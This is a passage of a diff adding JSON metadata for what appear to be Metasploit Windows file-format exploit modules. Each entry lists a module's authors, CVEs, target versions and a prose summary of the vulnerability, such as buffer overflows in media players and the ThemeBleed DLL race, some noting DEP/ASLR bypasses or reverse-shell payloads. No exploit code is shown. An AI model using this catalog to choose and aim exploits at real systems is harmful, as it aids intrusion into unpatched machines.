"arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3", + "Windows 7/Windows Vista" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/real_networks_netzip_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/real_player_url_property_bof": { + "name": "RealPlayer RealMedia File Handling Buffer Overflow", + "fullname": "exploit/windows/fileformat/real_player_url_property_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-12-14", + "type": "exploit", + "author": [ + "suto " + ], + "description": "This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.\n The vulnerability exists in the handling of real media files, due to the insecure\n usage of the GetPrivateProfileString function to retrieve the URL property from an\n InternetShortcut section.\n\n This module generates a malicious rm file which must be opened with RealPlayer via\n drag and drop or double click methods. It has been tested successfully on Windows\n XP SP3 with RealPlayer 15.0.5.109.", + "references": [ + "CVE-2012-5691", + "OSVDB-88486", + "BID-56956", + "URL-http://service.real.com/realplayer/security/12142012_player/en/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Real Player 15.0.5.109" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/real_player_url_property_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/real_player_url_property_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/realplayer_ver_attribute_bof": { + "name": "RealNetworks RealPlayer Version Attribute Buffer Overflow", + "fullname": "exploit/windows/fileformat/realplayer_ver_attribute_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-20", + "type": "exploit", + "author": [ + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by\n improper bounds checking of the version and encoding attributes inside\n the XML declaration.\n\n By persuading the victim to open a specially-crafted .RMP file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash.", + "references": [ + "BID-64695", + "EDB-30468", + "OSVDB-101356", + "CVE-2013-7260", + "US-CERT-VU-698278", + "URL-http://service.real.com/realplayer/security/12202013_player/en/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/realplayer_ver_attribute_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/safenet_softremote_groupname": { + "name": "SafeNet SoftRemote GROUPNAME Buffer Overflow", + "fullname": "exploit/windows/fileformat/safenet_softremote_groupname", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-10-30", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SafeNet SoftRemote\n Security Policy Editor <= 10.8.5. When an attacker\n creates a specially formatted security policy with an\n overly long GROUPNAME argument, it is possible to execute\n arbitrary code.", + "references": [ + "CVE-2009-3861", + "OSVDB-59660", + "URL-http://www.senseofsecurity.com.au/advisories/SOS-09-008" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 English", + "WinSrv 2000 SP4 English", + "WinSrv 2000 SP2 English", + "WinSrv 2003 Enterprise Edition SP1 (v1023) English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/safenet_softremote_groupname", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/sascam_get": { + "name": "SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow", + "fullname": "exploit/windows/fileformat/sascam_get", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-12-29", + "type": "exploit", + "author": [ + "dean " + ], + "description": "The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.\n By passing an overly long argument via the Get method, a remote attacker could\n overflow a buffer and execute arbitrary code on the system with the privileges\n of the user. This control is not marked safe for scripting, please choose your\n attack vector carefully.", + "references": [ + "CVE-2008-6898", + "OSVDB-55945", + "BID-33053" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/sascam_get.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/sascam_get", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/scadaphone_zip": { + "name": "ScadaTEC ScadaPhone Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/scadaphone_zip", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-09-12", + "type": "exploit", + "author": [ + "mr_me " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 5.3.11.1230 of scadaTEC's ScadaPhone.\n\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted project zip file with ScadaPhone.\n By doing so, an attacker can execute arbitrary code as the victim user.", + "references": [ + "CVE-2011-4535", + "OSVDB-75375", + "URL-http://www.scadatec.com/", + "EDB-17817" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/scadaphone_zip.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/scadaphone_zip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/shadow_stream_recorder_bof": { + "name": "Shadow Stream Recorder 3.0.1.7 Buffer Overflow", + "fullname": "exploit/windows/fileformat/shadow_stream_recorder_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-29", + "type": "exploit", + "author": [ + "AlpHaNiX ", + "b0telh0 " + ], + "description": "This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.\n Using the application to open a specially crafted asx file, a buffer\n overflow may occur to allow arbitrary code execution under the context\n of the user.", + "references": [ + "CVE-2009-1641", + "OSVDB-81487", + "EDB-11957", + "BID-34864" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/shadow_stream_recorder_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/shaper_pdf_bof": { + "name": "PDF Shaper Buffer Overflow", + "fullname": "exploit/windows/fileformat/shaper_pdf_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-10-03", + "type": "exploit", + "author": [ + "metacom27 ", + "metacom" + ], + "description": "PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.", + "references": [ + "EDB-37760" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/shaper_pdf_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/shaper_pdf_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/somplplayer_m3u": { + "name": "S.O.M.P.L 1.0 Player Buffer Overflow", + "fullname": "exploit/windows/fileformat/somplplayer_m3u", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-01-22", + "type": "exploit", + "author": [ + "Rick2600", + "dookie" + ], + "description": "This module exploits a buffer overflow in Simple Open Music Player v1.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "OSVDB-64368", + "EDB-11219" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/somplplayer_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/subtitle_processor_m3u_bof": { + "name": "Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow", + "fullname": "exploit/windows/fileformat/subtitle_processor_m3u_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-04-26", + "type": "exploit", + "author": [ + "Brandon Murphy", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Subtitle Processor 7. By\n supplying a long string of data as a .m3u file, Subtitle Processor first converts\n this input in Unicode, which expands the string size, and then attempts to copy it\n inline on the stack. This results a buffer overflow with SEH overwritten, allowing\n arbitrary code execution.", + "references": [ + "OSVDB-72050", + "EDB-17217", + "URL-http://sourceforge.net/projects/subtitleproc/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/subtitle_processor_m3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/syncbreeze_xml": { + "name": "Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow", + "fullname": "exploit/windows/fileformat/syncbreeze_xml", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-29", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16\n by using the import command option to import a specially crafted xml file.", + "references": [ + "CVE-2017-7310", + "EDB-41773" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/syncbreeze_xml", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/tfm_mmplayer_m3u_ppl_bof": { + "name": "TFM MMPlayer (m3u/ppl File) Buffer Overflow", + "fullname": "exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2012-03-23", + "type": "exploit", + "author": [ + "RjRjh Hack3r", + "bcoles " + ], + "description": "This module exploits a buffer overflow in MMPlayer 2.2\n The vulnerability is triggered when opening a malformed M3U/PPL file\n that contains an overly long string, which results in overwriting a\n SEH record, thus allowing arbitrary code execution under the context\n of the user.", + "references": [ + "CVE-2009-2566", + "OSVDB-80532", + "BID-52698", + "EDB-18656", + "EDB-18657" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/tfm_mmplayer_m3u_ppl_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/theme_dll_hijack_cve_2023_38146": { + "name": "Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146", + "fullname": "exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-09-13", + "type": "exploit", + "author": [ + "gabe_k", + "bwatters-r7", + "Spencer McIntyre" + ], + "description": "When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the\n msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll\n file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. It does this by\n opening the file for reading and verifying the signature before opening the file for execution.\n Because this action is performed in two discrete operations, it opens the procedure for a time of check to\n time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can\n serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name\n when the host intends to load/execute the dll.", + "references": [ + "CVE-2023-38146", + "URL-https://exploits.forsale/themebleed/", + "URL-https://github.com/gabe-k/themebleed/tree/main" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2024-01-04 11:11:23 +0000", + "path": "/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/theme_dll_hijack_cve_2023_38146", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "AKA": [ + "ThemeBleed" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/total_video_player_ini_bof": { + "name": "Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow", + "fullname": "exploit/windows/fileformat/total_video_player_ini_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-24", + "type": "exploit", + "author": [ + "Mike Czumak", + "Fr330wn4g3 " + ], + "description": "This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability\n occurs opening malformed Settings.ini file e.g. \"C:\\Program Files\\Total Video Player\\\".\n This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.", + "references": [ + "OSVDB-100619", + "EDB-29799" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/total_video_player_ini_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/tugzip": { + "name": "TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability", + "fullname": "exploit/windows/fileformat/tugzip", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-10-28", + "type": "exploit", + "author": [ + "Stefan Marin", + "Lincoln", + "TecR0c ", + "mr_me " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the latest version 3.5 of TugZip archiving utility.\n In order to trigger the vulnerability, an attacker must convince someone\n to load a specially crafted zip file with TugZip by double click or file open.\n By doing so, an attacker can execute arbitrary code as the victim user.", + "references": [ + "OSVDB-49371", + "CVE-2008-4779", + "BID-31913", + "EDB-12008" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/tugzip.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/tugzip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ultraiso_ccd": { + "name": "UltraISO CCD File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/ultraiso_ccd", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-04-03", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CCD files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open an CCD file.\n\n NOTE: A file with the same base name, but the extension of \"img\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.", + "references": [ + "CVE-2009-1260", + "OSVDB-53275", + "BID-34363", + "BID-38613", + "EDB-8343" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal - Double-Click/Command Line Open Method", + "Windows Universal - File->Open + Toolbar Open Methods" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ultraiso_ccd.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ultraiso_ccd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ultraiso_cue": { + "name": "UltraISO CUE File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/ultraiso_cue", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-05-24", + "type": "exploit", + "author": [ + "n00b", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CUE files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open an CUE file.\n\n NOTE: A file with the same base name, but the extension of \"bin\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.", + "references": [ + "CVE-2007-2888", + "OSVDB-36570", + "BID-24140", + "EDB-3978" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows - UltraISO v8.6.2.2011 portable", + "Windows - UltraISO v8.6.0.1936" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ultraiso_cue.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ultraiso_cue", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ursoft_w32dasm": { + "name": "URSoft W32Dasm Disassembler Function Buffer Overflow", + "fullname": "exploit/windows/fileformat/ursoft_w32dasm", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-01-24", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in W32Dasm <= v8.93.\n By creating a malicious file and convincing a user to disassemble\n the file with a vulnerable version of W32Dasm, the Imports/Exports\n function is copied to the stack and arbitrary code may be executed\n locally as the user.", + "references": [ + "CVE-2005-0308", + "OSVDB-13169", + "BID-12352", + "URL-http://aluigi.altervista.org/adv/w32dasmbof-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ursoft_w32dasm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/varicad_dwb": { + "name": "VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/varicad_dwb", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-03-17", + "type": "exploit", + "author": [ + "n00b", + "dookie", + "MC ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n An attacker must send the file to victim and the victim must open the file.", + "references": [ + "OSVDB-63067", + "BID-38815", + "EDB-11789" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/varicad_dwb.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/varicad_dwb", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/videocharge_studio": { + "name": "VideoCharge Studio Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/videocharge_studio", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-27", + "type": "exploit", + "author": [ + "metacom", + "Andrew Smith", + "Christian Mehlmauer " + ], + "description": "This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when\n processing a specially crafted .VSC file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.", + "references": [ + "OSVDB-69616", + "EDB-29234" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VideoCharge Studio 2.12.3.685" + ], + "mod_time": "2023-04-04 09:48:51 +0000", + "path": "/modules/exploits/windows/fileformat/videocharge_studio.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/videocharge_studio", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [], + "NOCVE": [ + "Reason not given" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/videolan_tivo": { + "name": "VideoLAN VLC TiVo Buffer Overflow", + "fullname": "exploit/windows/fileformat/videolan_tivo", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-10-22", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in VideoLAN VLC 0.9.4.\n By creating a malicious TY file, a remote attacker could overflow a\n buffer and execute arbitrary code.", + "references": [ + "CVE-2008-4654", + "OSVDB-49181", + "BID-31813" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VideoLAN VLC 0.9.4 (XP SP3 English)", + "VideoLAN VLC 0.9.2 (XP SP3 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/videolan_tivo.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/videolan_tivo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/videospirit_visprj": { + "name": "VeryTools Video Spirit Pro", + "fullname": "exploit/windows/fileformat/videospirit_visprj", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-11", + "type": "exploit", + "author": [ + "Acidgen", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Video Spirit <= 1.70.\n When opening a malicious project file (.visprj), a stack buffer overflow occurs,\n resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", + "references": [ + "CVE-2011-0499", + "CVE-2011-0500", + "OSVDB-70619", + "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-001" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/videospirit_visprj.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/videospirit_visprj", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/visio_dxf_bof": { + "name": "Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability", + "fullname": "exploit/windows/fileformat/visio_dxf_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-05-04", + "type": "exploit", + "author": [ + "Unknown", + "Shahin Ramezany ", + "juan vazquez " + ], + "description": "This module exploits a stack based overflow vulnerability in the handling\n of the DXF files by Microsoft Visio 2002. Revisions prior to the release of\n the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application\n is used to import a specially crafted DXF file, while parsing the HEADER section\n of the DXF file.\n\n To trigger the vulnerability an attacker must convince someone to insert a\n specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'", + "references": [ + "CVE-2010-1681", + "OSVDB-64446", + "BID-39836", + "URL-http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow", + "URL-http://web.archive.org/web/20101113032001/http://www.exploit-db.com:80/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Visio 2002 English on Windows XP SP3 Spanish", + "Visio 2002 English on Windows XP SP3 English" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/visio_dxf_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/visiwave_vwr_type": { + "name": "VisiWave VWR File Parsing Vulnerability", + "fullname": "exploit/windows/fileformat/visiwave_vwr_type", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-05-20", + "type": "exploit", + "author": [ + "mr_me ", + "TecR0c " + ], + "description": "This module exploits a vulnerability found in VisiWave's Site Survey Report application.\n When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'\n property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',\n 'Image'), but if a match isn't found, the function that's supposed to handle this routine\n ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]\n instruction. This allows attackers to overwrite it with any arbitrary value, and results code\n execution. A patch is available at visiwave.com; the fix is done by XORing the return value as\n null if no match is found, and then it is validated before use.\n\n NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a\n victim user to 'double click' the malicious VWR file and execute code. This module was also built\n to bypass ASLR and DEP.", + "references": [ + "CVE-2011-2386", + "OSVDB-72464", + "URL-http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html", + "URL-http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3/Windows 7 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/visiwave_vwr_type.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/visiwave_vwr_type", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_mkv": { + "name": "VLC Media Player MKV Use After Free", + "fullname": "exploit/windows/fileformat/vlc_mkv", + "aliases": [], + "rank": 500, + "disclosure_date": "2018-05-24", + "type": "exploit", + "author": [ + "Eugene Ng - GovTech", + "Winston Ho - GovTech" + ], + "description": "This module exploits a use after free vulnerability in\n VideoLAN VLC =< 2.2.8. The vulnerability exists in the parsing of\n MKV files and affects both 32 bits and 64 bits.\n\n In order to exploit this, this module will generate two files:\n The first .mkv file contains the main vulnerability and heap spray,\n the second .mkv file is required in order to take the vulnerable code\n path and should be placed under the same directory as the .mkv file.\n\n This module has been tested against VLC v2.2.8. Tested with payloads\n windows/exec, windows/x64/exec, windows/shell/reverse_tcp,\n windows/x64/shell/reverse_tcp. Meterpreter payloads if used can\n cause the application to crash instead.", + "references": [ + "CVE-2018-11529", + "EDB-44979" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VLC 2.2.8 on Windows 10 x86", + "VLC 2.2.8 on Windows 10 x64" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_mkv.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_mkv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_modplug_s3m": { + "name": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/vlc_modplug_s3m", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-04-07", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits an input validation error in libmod_plugin as\n included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n are affected. By creating a malicious S3M file, a remote attacker\n could execute arbitrary code.\n\n Although other products that bundle libmodplug may be vulnerable, this\n module was only tested against VLC.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it. As such,\n this module is capable of bypassing DEP, but not ASLR.", + "references": [ + "CVE-2011-1574", + "OSVDB-72143", + "URL-http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b", + "URL-https://seclists.org/fulldisclosure/2011/Apr/113" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": 